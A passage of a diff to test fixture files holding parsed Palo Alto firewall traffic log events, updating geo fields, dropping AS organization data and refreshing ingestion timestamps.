16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", 
@@ -12087,26 +11727,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 288, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12228,7 +11863,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031819500Z", + "ingested": "2021-12-14T14:51:01.287244481Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -12256,26 +11891,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 149, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -12397,7 +12027,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031824900Z", + "ingested": "2021-12-14T14:51:01.287244833Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -12425,26 +12055,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 202, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12566,7 +12191,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031830600Z", + "ingested": "2021-12-14T14:51:01.287245383Z", "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", 
@@ -12594,26 +12219,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 195, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12735,7 +12355,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031836Z", + "ingested": "2021-12-14T14:51:01.287245734Z", "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", @@ -12763,26 +12383,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 123, "bytes": 90, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -12904,7 +12519,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031843200Z", + "ingested": "2021-12-14T14:51:01.287246088Z", "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", @@ -12932,26 +12547,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 192, - "ip": "175.16.199.1", - "packets": 2 + "packets": 2, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13073,7 +12683,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031849100Z", + "ingested": "2021-12-14T14:51:01.287246442Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", 
@@ -13100,26 +12710,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 208, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13241,7 +12846,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031854500Z", + "ingested": "2021-12-14T14:51:01.287246859Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13268,26 +12873,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 100, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -13409,7 +13009,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031859900Z", + "ingested": "2021-12-14T14:51:01.287247203Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13436,26 +13036,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 7237, - "ip": "175.16.199.1", - "packets": 11 + "packets": 11, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -13577,7 +13172,7 @@ }, "event": { "duration": 10000000000, - "ingested": "2021-12-09T13:44:05.031864200Z", + "ingested": "2021-12-14T14:51:01.287247537Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13604,26 +13199,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 109, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -13745,7 +13335,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031868700Z", + "ingested": "2021-12-14T14:51:01.287247880Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -13773,26 +13363,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 116, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13914,7 +13499,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031874200Z", + "ingested": "2021-12-14T14:51:01.287248230Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", 
@@ -13942,26 +13527,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 96, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -14083,7 +13663,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031879700Z", + "ingested": "2021-12-14T14:51:01.287248627Z", "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", @@ -14111,26 +13691,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 654, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -14252,7 +13827,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031883500Z", + "ingested": "2021-12-14T14:51:01.287248977Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14280,26 +13855,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 654, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -14421,7 +13991,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031887800Z", + "ingested": "2021-12-14T14:51:01.287249326Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14449,26 +14019,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 654, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -14590,7 +14155,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031893300Z", + "ingested": "2021-12-14T14:51:01.287249673Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14618,26 +14183,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 7820, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -14759,7 +14319,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031897500Z", + "ingested": "2021-12-14T14:51:01.287250013Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14787,26 +14347,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 654, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -14928,7 +14483,7 @@ }, "event": { "duration": 11000000000, - "ingested": "2021-12-09T13:44:05.031901800Z", + "ingested": "2021-12-14T14:51:01.287250425Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -14956,26 +14511,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 214, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -15097,7 +14647,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031905300Z", + "ingested": "2021-12-14T14:51:01.287250769Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -15125,26 +14675,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 214, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -15266,7 +14811,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031909900Z", + "ingested": "2021-12-14T14:51:01.287251124Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -15294,26 +14839,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 214, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -15435,7 +14975,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031915300Z", + "ingested": "2021-12-14T14:51:01.287251485Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -15463,26 +15003,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 280, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
